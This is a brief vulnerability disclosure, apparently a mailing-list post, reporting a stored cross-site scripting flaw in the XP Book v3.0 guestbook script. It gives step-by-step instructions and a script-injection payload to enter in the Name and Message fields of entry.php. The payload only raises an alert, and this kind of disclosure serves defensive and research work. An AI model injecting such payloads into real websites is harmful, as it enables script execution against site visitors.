XSS in XP Book version 3.0



Hello ,

I haven't send any new bugs for long time :)

Vulnerable : XP Book v3.0
coded by http://kuwaitiphp.alruban.net
* i think their website doesn't work at the moment

exploit :
open http://www.example.com/xpbook/entry.php

then type in
Name:
'><script>alert(xss);</script>
Email :
whatever@xxxxxxxxxxxx

Message :
'><script>alert(xss);</script>

then press Send ! and the code that we typed is going to work !

discovered by / Linux_Drox
www.LeZr.Com

Best regards ,